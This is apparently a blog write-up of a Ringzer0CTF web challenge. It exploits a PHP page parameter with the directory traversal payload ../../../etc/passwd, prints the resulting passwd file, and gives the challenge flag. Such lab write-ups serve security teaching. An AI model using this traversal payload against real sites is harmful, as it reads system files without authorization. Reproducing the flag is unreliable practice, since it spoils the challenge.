Ringzer0CTF – Web – Looking for password file

Ringzer0CTF – Web – Looking for password file

Objective:

Get the flag…… I don’t know what else to put here

Solution:

so we are looking for a password file

this is the challenge site

http://challenges.ringzer0team.com:10075/?page=lorem.php

it looks like its using php to load up a page named lorem.php - the little "?" in the URL is what makes me think its php

The first thing I think of when I see a URL like this is directory traversal

let’s check and see if this is exploitable using directory traversal

Let’s try ../ instead of lorem.php to see if it will try to read it from the next directory above where its currently looking

http://challenges.ringzer0team.com:10075/?page=../

Warning: require(/var/www): failed to open stream: No such file or directory in /var/www/html/index.php on line 43
Fatal error: require(): Failed opening required '../' (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/html/index.php on line 43

That is exactly the error message we wanted to see instead of looking int /var/www/html for a file its looking instead at /var/www

Just for ease of understanding here lets try to double up our ../ to try the directory above www

http://challenges.ringzer0team.com:10075/?page=../../

Warning: require(/var): failed to open stream: No such file or directory in /var/www/html/index.php on line 43

Cool, it did go up another directory just like we thought instead of looking in /var/www/ we are now having it look in /var

Now lets see if we can get to the passwd file

Here is a little bit a bout the passwd file

The /etc/passwd file is a text file that describes user login accounts for the system. It should have read permission allowed for all users (many utilities, like ls(1) use it to map user IDs to usernames), but write access only for the superuser.

https://linux.die.net/man/5/passwd

Here is a little bit about understanding what the format is inside of the passwd file

https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/

so we want our traversal directory to go from

/var/www/html

/etc/passwd

So we need to first account for moving the path up to / and then move to /etc

So one ../ will take us to /var/www

Adding another ../ will take us to /var

Adding another ../ will take us all the way up to /

From there we can put the path we really want to get to /etc/passwd

So our traversal will look like ../../../etc/passwd

http://challenges.ringzer0team.com:10075/?page=../../../etc/passwd

and now we see this

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:FLAG-zH9g1934v774Y7Zx5s16t5ym8Z:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin syslog:x:102:105::/home/syslog:/bin/false

And there highlighted is our flag for this level

FLAG-zH9g1934v774Y7Zx5s16t5ym8Z

circusmonkey404's Security Site

Search This Blog